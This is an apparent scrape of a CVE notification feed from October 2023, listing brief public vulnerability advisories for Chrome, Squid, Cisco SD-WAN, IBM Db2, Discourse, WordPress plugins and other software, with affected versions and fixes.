🚨 CVE-2023-45129Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. Prior to version 1.94.0, a malicious server ACL event can impact performance temporarily or permanently leading to a persistent denial of service. Homeservers running on a closed federation (which presumably do not need to use server ACLs) are not affected. Server administrators are advised to upgrade to Synapse 1.94.0 or later. As a workaround, rooms with malicious server ACL events can be purged and blocked using the admin API.🎖@cveNotify |
|
| 2023-10-17 23:23:27 |
🚨 CVE-2023-44094Type confusion vulnerability in the distributed file module.Successful exploitation of this vulnerability may cause the device to restart.🎖@cveNotify |
|
| 2023-10-17 23:23:26 |
🚨 CVE-2023-41373A directory traversal vulnerability exists in the BIG-IP Configuration Utility that may allow an authenticated attacker to execute commands on the BIG-IP system. For BIG-IP system running in Appliance mode, a successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-10-17 23:23:24 |
🚨 CVE-2023-4128A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.🎖@cveNotify |
|
| 2023-10-17 23:23:23 |
🚨 CVE-2023-4903Inappropriate implementation in Custom Mobile Tabs in Google Chrome on Android prior to 117.0.5938.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-17 23:23:22 |
🚨 CVE-2023-4909Inappropriate implementation in Interstitials in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-17 23:23:21 |
🚨 CVE-2023-4901Inappropriate implementation in Prompts in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-17 23:23:20 |
🚨 CVE-2023-4902Inappropriate implementation in Input in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-17 23:23:19 |
🚨 CVE-2023-4900Inappropriate implementation in Custom Tabs in Google Chrome on Android prior to 117.0.5938.62 allowed a remote attacker to obfuscate a permission prompt via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-17 23:23:18 |
🚨 CVE-2023-41085When IPSec is configured on a Virtual Server, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-10-17 23:23:17 |
🚨 CVE-2023-4906Insufficient policy enforcement in Autofill in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-17 23:23:16 |
🚨 CVE-2023-4907Inappropriate implementation in Intents in Google Chrome on Android prior to 117.0.5938.62 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-17 23:23:15 |
🚨 CVE-2023-4908Inappropriate implementation in Picture in Picture in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-17 16:21:59 |
🚨 CVE-2023-451591E Client installer can perform arbitrary file deletion on protected files. A non-privileged user could provide a symbolic link or Windows junction to point to a protected directory in the installer that the 1E Client would then clear on service startup. A hotfix is available from the 1E support portal that forces the 1E Client to check for a symbolic link or junction and if it finds one refuses to use that path and instead creates a path involving a random GUID.for v8.1 use hotfix Q23097for v8.4 use hotfix Q23105for v9.0 use hotfix Q23115for SaaS customers, use 1EClient v23.7 plus hotfix Q23121🎖@cveNotify |
|
| 2023-10-17 10:52:50 |
🚨 CVE-2023-41752Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Traffic Server.This issue affects Apache Traffic Server: from 8.0.0 through 8.1.8, from 9.0.0 through 9.2.2.Users are recommended to upgrade to version 8.1.9 or 9.2.3, which fixes the issue.🎖@cveNotify |
|
| 2023-10-17 10:52:48 |
🚨 CVE-2023-4089On affected Wago products an remote attacker with administrative privileges can access files to which he has already access to through an undocumented local file inclusion. This access is logged in a different log file than expected.🎖@cveNotify |
|
| 2023-10-17 10:52:46 |
🚨 CVE-2023-44693D-Link Online behavior audit gateway DAR-7000 V31R02B1413C is vulnerable to SQL Injection via /importexport.php.🎖@cveNotify |
|
| 2023-10-17 10:52:44 |
🚨 CVE-2023-44694D-Link Online behavior audit gateway DAR-7000 V31R02B1413C is vulnerable to SQL Injection via /log/mailrecvview.php.🎖@cveNotify |
|
| 2023-10-17 10:52:41 |
🚨 CVE-2023-34209Exposure of Sensitive System Information to an Unauthorized Control Sphere in create template function in EasyUse MailHunter Ultimate 2023 and earlier allow remote authenticated users to obtain the absolute path via unencrypted VIEWSTATE parameter.🎖@cveNotify |
|
| 2023-10-17 10:52:39 |
🚨 CVE-2023-34210SQL Injection in create customer group function in EasyUse MailHunter Ultimate 2023 and earlier allow remote authenticated users to execute arbitrary SQL commands via the ctl00$ContentPlaceHolder1$txtCustSQL parameter.🎖@cveNotify |
|
| 2023-10-17 10:52:38 |
🚨 CVE-2023-45357Archer Platform 6.x before 6.13 P2 HF2 (6.13.0.2.2) contains a sensitive information disclosure vulnerability. An authenticated attacker could potentially obtain access to sensitive information via a popup warning message. 6.14 (6.14.0) is also a fixed release.🎖@cveNotify |
|
| 2023-10-17 10:52:35 |
🚨 CVE-2023-45358Archer Platform 6.x before 6.13 P2 HF2 (6.13.0.2.2) contains a stored cross-site scripting (XSS) vulnerability. A remote authenticated malicious Archer user could potentially exploit this vulnerability to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14 (6.14.0) is also a fixed release.🎖@cveNotify |
|
| 2023-10-17 10:52:29 |
🚨 CVE-2023-45375In the module "PireosPay" (pireospay) before version 1.7.10 from 01generator.com for PrestaShop, a guest can perform SQL injection via `PireosPayValidationModuleFrontController::postProcess().`🎖@cveNotify |
|
| 2023-10-17 10:52:25 |
🚨 CVE-2023-45386In the module extratabspro before version 2.2.8 from MyPresta.eu for PrestaShop, a guest can perform SQL injection via `extratabspro::searchcategory()`, `extratabspro::searchproduct()` and `extratabspro::searchmanufacturer().'🎖@cveNotify |
|
| 2023-10-17 10:52:22 |
🚨 CVE-2023-42824The issue was addressed with improved checks. This issue is fixed in iOS 17.0.3 and iPadOS 17.0.3, iOS 16.7.1 and iPadOS 16.7.1. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.🎖@cveNotify |
|
| 2023-10-17 10:52:20 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-17 10:52:18 |
🚨 CVE-2023-38039When curl retrieves an HTTP response, it stores the incoming headers so thatthey can be accessed later via the libcurl headers API.However, curl did not have a limit in how many or how large headers it wouldaccept in a response, allowing a malicious server to stream an endless seriesof headers and eventually cause curl to run out of heap memory.🎖@cveNotify |
|
| 2023-10-17 10:52:15 |
🚨 CVE-2021-31807An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.🎖@cveNotify |
|
| 2023-10-17 10:52:13 |
🚨 CVE-2021-33620Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server.🎖@cveNotify |
|
| 2023-10-17 10:52:11 |
🚨 CVE-2021-28651An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption.🎖@cveNotify |
|
| 2023-10-17 10:52:09 |
🚨 CVE-2021-31808An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this.🎖@cveNotify |
|
| 2023-10-17 10:52:07 |
🚨 CVE-2021-28652An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to incorrect parser validation, it allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger memory leaks that. over time, lead to a Denial of Service via an unspecified short query string. This attack is limited to clients with Cache Manager API access privilege.🎖@cveNotify |
|
| 2023-10-17 10:52:05 |
🚨 CVE-2021-28662An issue was discovered in Squid 4.x before 4.15 and 5.x before 5.0.6. If a remote server sends a certain response header over HTTP or HTTPS, there is a denial of service. This header can plausibly occur in benign network traffic.🎖@cveNotify |
|
| 2023-10-17 10:52:03 |
🚨 CVE-2021-31806An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.🎖@cveNotify |
|
| 2023-10-17 06:22:32 |
🚨 CVE-2021-29913IBM Security Verify Privilege On-Premise 11.5 could allow an authenticated user to obtain sensitive information or perform unauthorized actions due to improper input validation. IBM X-Force ID: 207898.🎖@cveNotify |
|
| 2023-10-17 06:22:31 |
🚨 CVE-2021-38859IBM Security Verify Privilege On-Premises 11.5 could allow a user to obtain version number information using a specially crafted HTTP request that could be used in further attacks against the system. IBM X-Force ID: 207899.🎖@cveNotify |
|
| 2023-10-17 06:22:29 |
🚨 CVE-2022-22375IBM Security Verify Privilege On-Premises 11.5 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM X-Force ID: 221681.🎖@cveNotify |
|
| 2023-10-17 06:22:26 |
🚨 CVE-2022-22380IBM Security Verify Privilege On-Premises 11.5 could allow an attacker to spoof a trusted entity due to improperly validating certificates. IBM X-Force ID: 221957.🎖@cveNotify |
|
| 2023-10-17 06:22:24 |
🚨 CVE-2022-22385IBM Security Verify Privilege On-Premises 11.5 could disclose sensitive information to an attacked due to the transmission of data in clear text. IBM X-Force ID: 221962.🎖@cveNotify |
|
| 2023-10-17 06:22:22 |
🚨 CVE-2022-22386IBM Security Verify Privilege On-Premises 11.5 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 221963.🎖@cveNotify |
|
| 2023-10-17 06:22:20 |
🚨 CVE-2022-43889IBM Security Verify Privilege On-Premises 11.5 could disclose sensitive information through an HTTP request that could aid an attacker in further attacks against the system. IBM X-Force ID: 240452.🎖@cveNotify |
|
| 2023-10-17 06:22:17 |
🚨 CVE-2022-43893IBM Security Verify Privilege On-Premises 11.5 could allow a privileged user to cause by using a malicious payload. IBM X-Force ID: 240634.🎖@cveNotify |
|
| 2023-10-17 06:22:16 |
🚨 CVE-2022-22377IBM Security Verify Privilege On-Premises 11.5 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 221827.🎖@cveNotify |
|
| 2023-10-17 06:22:14 |
🚨 CVE-2022-22384IBM Security Verify Privilege On-Premises 11.5 could allow an attacker to modify messages returned from the server due to hazardous input validation. IBM X-Force ID: 221961.🎖@cveNotify |
|
| 2023-10-17 06:22:12 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-10-17 06:22:10 |
🚨 CVE-2011-10004A vulnerability was found in reciply Plugin up to 1.1.7 on WordPress. It has been rated as critical. This issue affects some unknown processing of the file uploadImage.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. Upgrading to version 1.1.8 is able to address this issue. The identifier of the patch is e3ff616dc08d3aadff9253f1085e13f677d0c676. It is recommended to upgrade the affected component. The identifier VDB-242189 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-17 06:22:08 |
🚨 CVE-2012-10016A vulnerability classified as problematic has been found in Halulu simple-download-button-shortcode Plugin 1.0 on WordPress. Affected is an unknown function of the file simple-download-button_dl.php of the component Download Handler. The manipulation of the argument file leads to information disclosure. It is possible to launch the attack remotely. Upgrading to version 1.1 is able to address this issue. The patch is identified as e648a8706818297cf02a665ae0bae1c069dea5f1. It is recommended to upgrade the affected component. VDB-242190 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-17 06:22:06 |
🚨 CVE-2023-38719IBM Db2 11.5 could allow a local user with special privileges to cause a denial of service during database deactivation on DPF. IBM X-Force ID: 261607.🎖@cveNotify |
|
| 2023-10-17 06:22:05 |
🚨 CVE-2023-40372IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to denial of service with a specially crafted SQL statement using External Tables. IBM X-Force ID: 263499.🎖@cveNotify |
|
| 2023-10-17 06:22:03 |
🚨 CVE-2023-40373IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to denial of service with a specially crafted query containing common table expressions. IBM X-Force ID: 263574.🎖@cveNotify |
|
| 2023-10-17 06:22:02 |
🚨 CVE-2023-45152Engelsystem is a shift planning system for chaos events. A Blind SSRF in the "Import schedule" functionality makes it possible to perform a port scan against the local environment. This vulnerability has been fixed in commit ee7d30b33. If a patch cannot be deployed, operators should ensure that no HTTP(s) services listen on localhost and/or systems only reachable from the host running the engelsystem software. If such services are necessary, they should utilize additional authentication.🎖@cveNotify |
|
| 2023-10-17 06:22:01 |
🚨 CVE-2023-45659Engelsystem is a shift planning system for chaos events. If a users' password is compromised and an attacker gained access to a users' account, i.e., logged in and obtained a session, an attackers' session is not terminated if the users' account password is reset. This vulnerability has been fixed in the commit `dbb089315ff3d`. Users are advised to update their installations. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-17 06:21:59 |
🚨 CVE-2023-4215Advantech WebAccess version 9.1.3 contains an exposure of sensitive information to an unauthorized actor vulnerability that could leak user credentials.🎖@cveNotify |
|
| 2023-10-17 06:21:57 |
🚨 CVE-2023-41419An issue in Gevent before version 23.9.0 allows a remote attacker to escalate privileges via a crafted script to the WSGIServer component.🎖@cveNotify |
|
| 2023-10-17 00:52:12 |
🚨 CVE-2023-30991IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to denial of service with a specially crafted query. IBM X-Force ID: 254037.🎖@cveNotify |
|
| 2023-10-17 00:52:11 |
🚨 CVE-2023-40374IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to denial of service with a specially crafted query statement. IBM X-Force ID: 263575.🎖@cveNotify |
|
| 2023-10-17 00:52:10 |
🚨 CVE-2023-38728IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted XML query statement. IBM X-Force ID: 262258.🎖@cveNotify |
|
| 2023-10-17 00:52:09 |
🚨 CVE-2023-38740IBM Db2 for Linux, UNIX, and Windows (includes Db2 Connect Server) 11.5 is vulnerable to a denial of service with a specially crafted SQL statement. IBM X-Force ID: 262613.🎖@cveNotify |
|
| 2023-10-17 00:52:08 |
🚨 CVE-2023-43658dicourse-calendar is a plugin for the Discourse messaging platform which adds the ability to create a dynamic calendar in the first post of a topic. Improper escaping of event titles could lead to Cross-site Scripting (XSS) within the 'email preview' UI when a site has CSP disabled. Having CSP disabled is a non-default configuration, so the vast majority of sites are unaffected. This problem is resolved in the latest version of the discourse-calendar plugin. Users are advised to upgrade. Users unable to upgrade should ensure CSP is enabled on the forum.🎖@cveNotify |
|
| 2023-10-17 00:52:06 |
🚨 CVE-2023-43659Discourse is an open source platform for community discussion. Improper escaping of user input allowed for Cross-site Scripting attacks via the digest email preview UI. This issue only affects sites with CSP disabled. This issue has been patched in the 3.1.1 stable release as well as the 3.2.0.beta1 release. Users are advised to upgrade. Users unable to upgrade should ensure CSP is enabled on the forum.🎖@cveNotify |
|
| 2023-10-17 00:52:05 |
🚨 CVE-2023-43814Discourse is an open source platform for community discussion. Attackers with details specific to a poll in a topic can use the `/polls/grouped_poll_results` endpoint to view the content of options in the poll and the number of votes for groups of poll participants. This impacts private polls where the results were intended to only be viewable by authorized users. This issue is patched in the 3.1.1 stable and 3.2.0.beta2 versions of Discourse. There is no workaround for this issue apart from upgrading to the fixed version.🎖@cveNotify |
|
| 2023-10-17 00:52:04 |
🚨 CVE-2023-44391Discourse is an open source platform for community discussion. User summaries are accessible for anonymous users even when `hide_user_profiles_from_public` is enabled. This problem has been patched in the 3.1.1 stable and 3.2.0.beta2 version of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-17 00:52:00 |
🚨 CVE-2023-44394MantisBT is an open source bug tracker. Due to insufficient access-level checks on the Wiki redirection page, any user can reveal private Projects' names, by accessing wiki.php with sequentially incremented IDs. This issue has been addressed in commit `65c44883f` which has been included in release `2.258`. Users are advised to upgrade. Users unable to upgrade should disable wiki integration ( `$g_wiki_enable = OFF;`).🎖@cveNotify |
|
| 2023-10-17 00:51:59 |
🚨 CVE-2023-45131Discourse is an open source platform for community discussion. New chat messages can be read by making an unauthenticated POST request to MessageBus. This issue is patched in the 3.1.1 stable and 3.2.0.beta2 versions of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-17 00:51:58 |
🚨 CVE-2023-45540An issue in Jorani Leave Management System 1.0.3 allows a remote attacker to execute arbitrary HTML code via a crafted script to the comment field of the List of Leave requests page.🎖@cveNotify |
|
| 2023-10-17 00:51:57 |
🚨 CVE-2023-45807OpenSearch is a community-driven, open source fork of Elasticsearch and Kibana following the license change in early 2021. There is an issue with the implementation of tenant permissions in OpenSearch Dashboards where authenticated users with read-only access to a tenant can perform create, edit and delete operations on index metadata of dashboards and visualizations in that tenant, potentially rendering them unavailable. This issue does not affect index data, only metadata. Dashboards correctly enforces read-only permissions when indexing and updating documents. This issue does not provide additional read access to data users don’t already have. This issue can be mitigated by disabling the tenants functionality for the cluster. Versions 1.3.14 and 2.11.0 contain a fix for this issue.🎖@cveNotify |
|
| 2023-10-17 00:51:56 |
🚨 CVE-2023-20198Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory Cisco will provide updates on the status of this investigation and when a software patch is available.🎖@cveNotify |
|
| 2023-10-16 19:22:41 |
🚨 CVE-2023-44096Vulnerability of brute-force attacks on the device authentication module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-16 19:22:39 |
🚨 CVE-2023-44109Clone vulnerability in the huks ta module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-16 19:22:38 |
🚨 CVE-2023-41304Parameter verification vulnerability in the window module.Successful exploitation of this vulnerability may cause the size of an app window to be adjusted to that of a floating window.🎖@cveNotify |
|
| 2023-10-16 19:22:35 |
🚨 CVE-2023-44097Vulnerability of the permission to access device SNs being improperly managed.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-16 19:22:33 |
🚨 CVE-2023-44100Broadcast permission control vulnerability in the Bluetooth module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-16 19:22:30 |
🚨 CVE-2023-20253A vulnerability in the command line interface (cli) management interface of Cisco SD-WAN vManage could allow an authenticated, local attacker to bypass authorization and allow the attacker to roll back the configuration on vManage controllers and edge router device. This vulnerability is due to improper access control in the cli-management interface of an affected system. An attacker with low-privilege (read only) access to the cli could exploit this vulnerability by sending a request to roll back the configuration on for other controller and devices managed by an affected system. A successful exploit could allow the attacker to to roll back the configuration on for other controller and devices managed by an affected system.🎖@cveNotify |
|
| 2023-10-16 19:22:28 |
🚨 CVE-2023-20262A vulnerability in the SSH service of Cisco Catalyst SD-WAN Manager could allow an unauthenticated, remote attacker to cause a process crash, resulting in a DoS condition for SSH access only. This vulnerability does not prevent the system from continuing to function, and web UI access is not affected. This vulnerability is due to insufficient resource management when an affected system is in an error condition. An attacker could exploit this vulnerability by sending malicious traffic to the affected system. A successful exploit could allow the attacker to cause the SSH process to crash and restart, resulting in a DoS condition for the SSH service.🎖@cveNotify |
|
| 2023-10-16 19:22:26 |
🚨 CVE-2023-20252A vulnerability in the Security Assertion Markup Language (SAML) APIs of Cisco Catalyst SD-WAN Manager Software could allow an unauthenticated, remote attacker to gain unauthorized access to the application as an arbitrary user. This vulnerability is due to improper authentication checks for SAML APIs. An attacker could exploit this vulnerability by sending requests directly to the SAML API. A successful exploit could allow the attacker to generate an authorization token sufficient to gain access to the application.🎖@cveNotify |
|
| 2023-10-16 19:22:24 |
🚨 CVE-2020-26064A vulnerability in the web UI of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by persuading a user to import a crafted XML file with malicious entries. A successful exploit could allow the attacker to read and write files within the affected application.🎖@cveNotify |
|
| 2023-10-16 19:22:22 |
🚨 CVE-2020-26065A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct path traversal attacks and obtain read access to sensitive files on an affected system. The vulnerability is due to insufficient validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to view arbitrary files on the affected system.🎖@cveNotify |
|
| 2023-10-16 19:22:19 |
🚨 CVE-2023-20214A vulnerability in the request authentication validation for the REST API of Cisco SD-WAN vManage software could allow an unauthenticated, remote attacker to gain read permissions or limited write permissions to the configuration of an affected Cisco SD-WAN vManage instance. This vulnerability is due to insufficient request validation when using the REST API feature. An attacker could exploit this vulnerability by sending a crafted API request to an affected vManage instance. A successful exploit could allow the attacker to retrieve information from and send information to the configuration of the affected Cisco vManage instance. This vulnerability only affects the REST API and does not affect the web-based management interface or the CLI.🎖@cveNotify |
|
| 2023-10-16 19:22:17 |
🚨 CVE-2023-20098A vulnerability in the CLI of Cisco SDWAN vManage Software could allow an authenticated, local attacker to delete arbitrary files. This vulnerability is due to improper filtering of directory traversal character sequences within system commands. An attacker with administrative privileges could exploit this vulnerability by running a system command containing directory traversal character sequences to target an arbitrary file. A successful exploit could allow the attacker to delete arbitrary files from the system, including files owned by root.🎖@cveNotify |
|
| 2023-10-16 19:22:14 |
🚨 CVE-2022-20930A vulnerability in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to overwrite and possibly corrupt files on an affected system. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by injecting arbitrary commands that are executed as the root user account. A successful exploit could allow the attacker to overwrite arbitrary system files, which could result in a denial of service (DoS) condition.🎖@cveNotify |
|
| 2023-10-16 19:22:10 |
🚨 CVE-2022-20775Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user.🎖@cveNotify |
|
| 2023-10-16 19:22:08 |
🚨 CVE-2022-20830A vulnerability in authentication mechanism of Cisco Software-Defined Application Visibility and Control (SD-AVC) on Cisco vManage could allow an unauthenticated, remote attacker to access the GUI of Cisco SD-AVC without authentication. This vulnerability exists because the GUI is accessible on self-managed cloud installations or local server installations of Cisco vManage. An attacker could exploit this vulnerability by accessing the exposed GUI of Cisco SD-AVC. A successful exploit could allow the attacker to view managed device names, SD-AVC logs, and SD-AVC DNS server IP addresses.🎖@cveNotify |
|
| 2023-10-16 19:22:07 |
🚨 CVE-2022-20696A vulnerability in the binding configuration of Cisco SD-WAN vManage Software containers could allow an unauthenticated, adjacent attacker who has access to the VPN0 logical network to also access the messaging service ports on an affected system. This vulnerability exists because the messaging server container ports on an affected system lack sufficient protection mechanisms. An attacker could exploit this vulnerability by connecting to the messaging service ports of the affected system. To exploit this vulnerability, the attacker must be able to send network traffic to interfaces within the VPN0 logical network. This network may be restricted to protect logical or physical adjacent networks, depending on device deployment configuration. A successful exploit could allow the attacker to view and inject messages into the messaging service, which can cause configuration changes or cause the system to reload.🎖@cveNotify |
|
| 2023-10-16 19:22:04 |
🚨 CVE-2022-20734A vulnerability in Cisco SD-WAN vManage Software could allow an authenticated, local attacker to view sensitive information on an affected system. This vulnerability is due to insufficient file system restrictions. An authenticated attacker with netadmin privileges could exploit this vulnerability by accessing the vshell of an affected system. A successful exploit could allow the attacker to read sensitive information on the underlying operating system.🎖@cveNotify |
|
| 2023-10-16 19:22:02 |
🚨 CVE-2022-20735A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. This vulnerability is due to insufficient CSRF protections for the web-based management interface on an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. These actions could include modifying the system configuration and deleting accounts.🎖@cveNotify |
|
| 2023-10-16 19:22:00 |
🚨 CVE-2022-20739A vulnerability in the CLI of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system as the root user. The attacker must be authenticated on the affected system as a low-privileged user to exploit this vulnerability. This vulnerability exists because a file leveraged by a root user is executed when a low-privileged user runs specific commands on an affected system. An attacker could exploit this vulnerability by injecting arbitrary commands to a specific file as a lower-privileged user and then waiting until an admin user executes specific commands. The commands would then be executed on the device by the root user. A successful exploit could allow the attacker to escalate their privileges on the affected system from a low-privileged user to the root user.🎖@cveNotify |
|
| 2023-10-16 19:21:58 |
🚨 CVE-2022-20747A vulnerability in the History API of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to gain access to sensitive information on an affected system. This vulnerability is due to insufficient API authorization checking on the underlying operating system. An attacker could exploit this vulnerability by sending a crafted API request to Cisco vManage as a lower-privileged user and gaining access to sensitive information that they would not normally be authorized to access.🎖@cveNotify |
|
| 2023-10-16 16:52:09 |
🚨 CVE-2023-42794Incomplete Cleanup vulnerability in Apache Tomcat.The internal fork of Commons FileUpload packaged with Apache Tomcat 9.0.70 through 9.0.80 and 8.5.85 through 8.5.93 included an unreleased, in progress refactoring that exposed a potential denial of service on Windows if a web application opened a stream for an uploaded file but failed to close the stream. The file would never be deleted from disk creating the possibility of an eventual denial of service due to the disk being full.Users are recommended to upgrade to version 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.🎖@cveNotify |
|
| 2023-10-16 12:51:58 |
🚨 CVE-2023-44809D-Link device DIR-820L 1.05B03 is vulnerable to Insecure Permissions.🎖@cveNotify |
|
| 2023-10-16 12:51:57 |
🚨 CVE-2023-45572Buffer Overflow vulnerability in DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G+V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G+V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G+V2.D1 v.23.08.23D1, and DI-7400G+V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the fn parameter of the tgfile.htm function.🎖@cveNotify |
|
| 2023-10-16 12:51:56 |
🚨 CVE-2023-45574Buffer Overflow vulnerability in DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G+V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G+V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G+V2.D1 v.23.08.23D1, and DI-7400G+V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the fn parameter of the file.data function.🎖@cveNotify |
|
| 2023-10-16 10:22:10 |
🚨 CVE-2023-4620The Booking Calendar WordPress plugin before 9.7.3.1 does not sanitize and escape some of its booking from data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against administrators🎖@cveNotify |
|
| 2023-10-16 10:22:08 |
🚨 CVE-2023-4822The vulnerability impacts instances with several organizations, and allows a user with Organization Admin permissions in one organization to change the permissions associated with Organization Viewer, Organization Editor and Organization Admin roles in all organizations.It also allows an Organization Admin to assign or revoke any permissions that they have to any user globally.This means that any Organization Admin can elevate their own permissions in any organization that they are already a member of, or elevate or restrict the permissions of any other user.The vulnerability does not allow a user to become a member of an organization that they are not already a member of, or to add any other users to an organization that the current user is not a member of.🎖@cveNotify |
|
| 2023-10-16 10:22:07 |
🚨 CVE-2023-4827The File Manager Pro WordPress plugin before 1.8 does not properly check the CSRF nonce in the `fs_connector` AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.🎖@cveNotify |
|
| 2023-10-16 10:22:06 |
🚨 CVE-2023-4834In Red Lion Europe mbCONNECT24 and mymbCONNECT24 and Helmholz myREX24 and myREX24.virtual up to and including 2.14.2 an improperly implemented access validation allows an authenticated, low privileged attacker to gain read access to limited, non-critical device information in his account he should not have access to.🎖@cveNotify |
|
| 2023-10-16 10:22:05 |
